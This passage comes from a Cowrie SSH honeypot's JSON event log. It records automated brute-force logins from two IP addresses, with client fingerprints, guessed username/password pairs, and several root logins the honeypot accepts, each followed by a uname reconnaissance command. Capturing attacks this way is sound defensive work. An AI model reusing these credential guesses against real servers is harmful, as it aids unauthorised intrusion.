enssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:58:00.254916Z","src_ip":"212.227.125.160","session":"b4c32e11780f"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:58:00.522940Z","src_ip":"212.227.125.160","session":"b4c32e11780f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:01.791003Z","src_ip":"212.227.125.160","session":"b4c32e11780f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36634,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffb9e3beca65","protocol":"ssh","message":"New connection: 212.227.125.160:36634 (1.2.3.4:22) [session: ffb9e3beca65]","sensor":"my-vps","timestamp":"2025-08-26T21:58:06.494199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:06.499372Z","src_ip":"212.227.125.160","session":"ffb9e3beca65"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:58:06.566990Z","src_ip":"212.227.125.160","session":"ffb9e3beca65"}
{"eventid":"cowrie.login.failed","username":"joakima","password":"joakima","message":"login attempt [joakima/joakima] failed","sensor":"my-vps","timestamp":"2025-08-26T21:58:06.773561Z","src_ip":"212.227.125.160","session":"ffb9e3beca65"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:07.823418Z","src_ip":"212.227.125.160","session":"ffb9e3beca65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60260,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c138e804d55","protocol":"ssh","message":"New connection: 212.227.125.160:60260 (1.2.3.4:22) [session: 6c138e804d55]","sensor":"my-vps","timestamp":"2025-08-26T21:58:12.088553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:12.089768Z","src_ip":"212.227.125.160","session":"6c138e804d55"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:58:12.134123Z","src_ip":"212.227.125.160","session":"6c138e804d55"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-26T21:58:12.268994Z","src_ip":"212.227.125.160","session":"6c138e804d55"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:13.386034Z","src_ip":"212.227.125.160","session":"6c138e804d55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55646,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffbb0cdef83c","protocol":"ssh","message":"New connection: 212.227.125.160:55646 (1.2.3.4:22) [session: ffbb0cdef83c]","sensor":"my-vps","timestamp":"2025-08-26T21:58:17.189840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:17.190966Z","src_ip":"212.227.125.160","session":"ffbb0cdef83c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:58:17.240766Z","src_ip":"212.227.125.160","session":"ffbb0cdef83c"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:58:17.405952Z","src_ip":"212.227.125.160","session":"ffbb0cdef83c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:58:17.524242Z","src_ip":"212.227.125.160","session":"ffbb0cdef83c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:58:17.524916Z","src_ip":"212.227.125.160","session":"ffbb0cdef83c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:17.576430Z","src_ip":"212.227.125.160","session":"ffbb0cdef83c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:17.577513Z","src_ip":"212.227.125.160","session":"ffbb0cdef83c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51034,"dst_ip":"1.2.3.4","dst_port":22,"session":"3788ae2771a6","protocol":"ssh","message":"New connection: 212.227.125.160:51034 (1.2.3.4:22) [session: 3788ae2771a6]","sensor":"my-vps","timestamp":"2025-08-26T21:58:22.912398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:22.913199Z","src_ip":"212.227.125.160","session":"3788ae2771a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:58:22.969520Z","src_ip":"212.227.125.160","session":"3788ae2771a6"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:58:23.113178Z","src_ip":"212.227.125.160","session":"3788ae2771a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:58:23.321927Z","src_ip":"212.227.125.160","session":"3788ae2771a6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:58:23.322605Z","src_ip":"212.227.125.160","session":"3788ae2771a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:23.370716Z","src_ip":"212.227.125.160","session":"3788ae2771a6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:23.371884Z","src_ip":"212.227.125.160","session":"3788ae2771a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46420,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea6df86a3837","protocol":"ssh","message":"New connection: 212.227.125.160:46420 (1.2.3.4:22) [session: ea6df86a3837]","sensor":"my-vps","timestamp":"2025-08-26T21:58:28.087668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:28.088808Z","src_ip":"212.227.125.160","session":"ea6df86a3837"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:58:28.232219Z","src_ip":"212.227.125.160","session":"ea6df86a3837"}
{"eventid":"cowrie.login.failed","username":"adminuser","password":"adminuser","message":"login attempt [adminuser/adminuser] failed","sensor":"my-vps","timestamp":"2025-08-26T21:58:29.042099Z","src_ip":"212.227.125.160","session":"ea6df86a3837"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:30.097846Z","src_ip":"212.227.125.160","session":"ea6df86a3837"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54496,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab84f65900f1","protocol":"ssh","message":"New connection: 212.227.235.229:54496 (1.2.3.4:22) [session: ab84f65900f1]","sensor":"my-vps","timestamp":"2025-08-26T21:58:33.565851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:33.740962Z","src_ip":"212.227.235.229","session":"ab84f65900f1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:58:33.741754Z","src_ip":"212.227.235.229","session":"ab84f65900f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41806,"dst_ip":"1.2.3.4","dst_port":22,"session":"332694f99feb","protocol":"ssh","message":"New connection: 212.227.125.160:41806 (1.2.3.4:22) [session: 332694f99feb]","sensor":"my-vps","timestamp":"2025-08-26T21:58:34.059800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:34.061201Z","src_ip":"212.227.125.160","session":"332694f99feb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:58:34.120895Z","src_ip":"212.227.125.160","session":"332694f99feb"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:58:34.317241Z","src_ip":"212.227.125.160","session":"332694f99feb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"21","message":"login attempt [admin/21] failed","sensor":"my-vps","timestamp":"2025-08-26T21:58:34.581579Z","src_ip":"212.227.235.229","session":"ab84f65900f1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:35.636739Z","src_ip":"212.227.125.160","session":"332694f99feb"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:35.741437Z","src_ip":"212.227.235.229","session":"ab84f65900f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37192,"dst_ip":"1.2.3.4","dst_port":22,"session":"338863059acb","protocol":"ssh","message":"New connection: 212.227.125.160:37192 (1.2.3.4:22) [session: 338863059acb]","sensor":"my-vps","timestamp":"2025-08-26T21:58:39.704295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:39.707190Z","src_ip":"212.227.125.160","session":"338863059acb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:58:39.758311Z","src_ip":"212.227.125.160","session":"338863059acb"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:58:39.985130Z","src_ip":"212.227.125.160","session":"338863059acb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:58:40.157386Z","src_ip":"212.227.125.160","session":"338863059acb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:58:40.158067Z","src_ip":"212.227.125.160","session":"338863059acb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:40.204522Z","src_ip":"212.227.125.160","session":"338863059acb"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:58:40.205614Z","src_ip":"212.227.125.160","session":"338863059acb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60812,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a78d699f4af","protocol":"ssh","message":"New connection: 212.227.125.160:60812 (1.2.3.4:22) [session: 5a78d699f4af]","sensor":"my-vps","timestamp":"2025-08-26T21:58:45.490048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:58:45.491037Z","src_ip":"212.227.125.160","session":"5a78d699f4af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-